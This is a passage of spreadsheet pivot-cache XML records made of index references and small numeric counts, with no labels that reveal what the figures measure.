    <x v="1266"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1266"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1266"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1267"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1267"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1267"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1267"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1267"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1267"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="25"/>
    <x v="1267"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="11"/>
    <x v="1267"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1267"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1267"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="22"/>
    <x v="1267"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="60"/>
    <x v="1267"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="21"/>
    <x v="1267"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1267"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="7"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="115"/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1268"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1268"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1268"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1268"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1268"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1268"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="1268"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1268"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1268"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1268"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1268"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1268"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1268"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1268"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1270"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1270"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1270"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1270"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1270"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1270"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1270"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="1270"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1270"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1270"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1270"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1270"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1270"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1270"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1270"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1271"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1271"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1271"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1271"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1271"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="1271"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="16"/>
    <x v="1271"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1271"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1271"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1271"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1271"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1271"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1271"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1271"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1272"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1272"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1272"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1272"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="1272"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="1272"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1272"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="9"/>
    <x v="1272"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="6"/>
    <x v="1272"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="1272"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="1272"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="1272"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1272"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1272"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1273"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1273"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1273"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1273"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1273"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1273"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1273"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1273"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1273"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1273"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="1273"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="17"/>
    <x v="1273"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1273"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1273"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1274"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1274"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1274"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1274"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1274"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1274"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1274"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1274"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1274"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1274"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1274"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1274"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1274"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1274"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1275"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1275"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1275"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1275"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1275"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1275"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1275"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1275"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1275"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1275"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1275"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1275"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1275"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1275"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1276"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1276"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1276"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1276"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="9"/>
    <x v="1276"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="19"/>
    <x v="1276"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1276"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1276"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1276"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1276"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1276"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1276"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1276"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1276"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1277"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1277"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1277"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1277"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1277"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1277"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1277"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1277"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1277"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1277"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="1277"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1277"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1277"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1277"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1278"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1278"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1278"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1278"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1278"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1278"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1278"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1278"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1278"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1278"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1278"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="7"/>
    <x v="1278"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1278"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1278"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1279"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1279"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1279"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1279"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1279"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1279"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="28"/>
    <x v="1279"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="44"/>
    <x v="1279"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1279"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1279"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1279"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1279"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1279"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1279"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1280"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1280"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1280"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1280"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1280"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1280"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1280"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1280"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1280"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1280"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1280"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1280"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1280"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1280"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1281"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1281"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1281"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1281"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1281"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="1281"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="45"/>
    <x v="1281"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="15"/>
    <x v="1281"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1281"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1281"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1281"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1281"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1281"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1281"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1282"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1282"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1282"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1282"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="22"/>
    <x v="1282"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="11"/>
    <x v="1282"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="39"/>
    <x v="1282"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="12"/>
    <x v="1282"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="17"/>
    <x v="1282"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="22"/>
    <x v="1282"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="345"/>
    <x v="1282"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="628"/>
    <x v="1282"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1282"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1282"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="23"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="23"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="7"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="7"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="27"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="27"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1283"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1284"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1284"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1284"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1284"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="15"/>
    <x v="1284"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1284"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1284"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1284"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1284"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1284"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="30"/>
    <x v="1284"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="1284"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1284"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1284"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="712"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="712"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="712"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="712"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="712"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="12"/>
    <x v="712"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1285"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1285"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="3"/>
    <x v="1285"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="2"/>
    <x v="1285"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1285"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1285"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1285"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="38"/>
    <x v="1285"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="1285"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1285"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="1285"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="38"/>
    <x v="1285"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1285"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1285"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="5"/>
    <x v="1286"/>
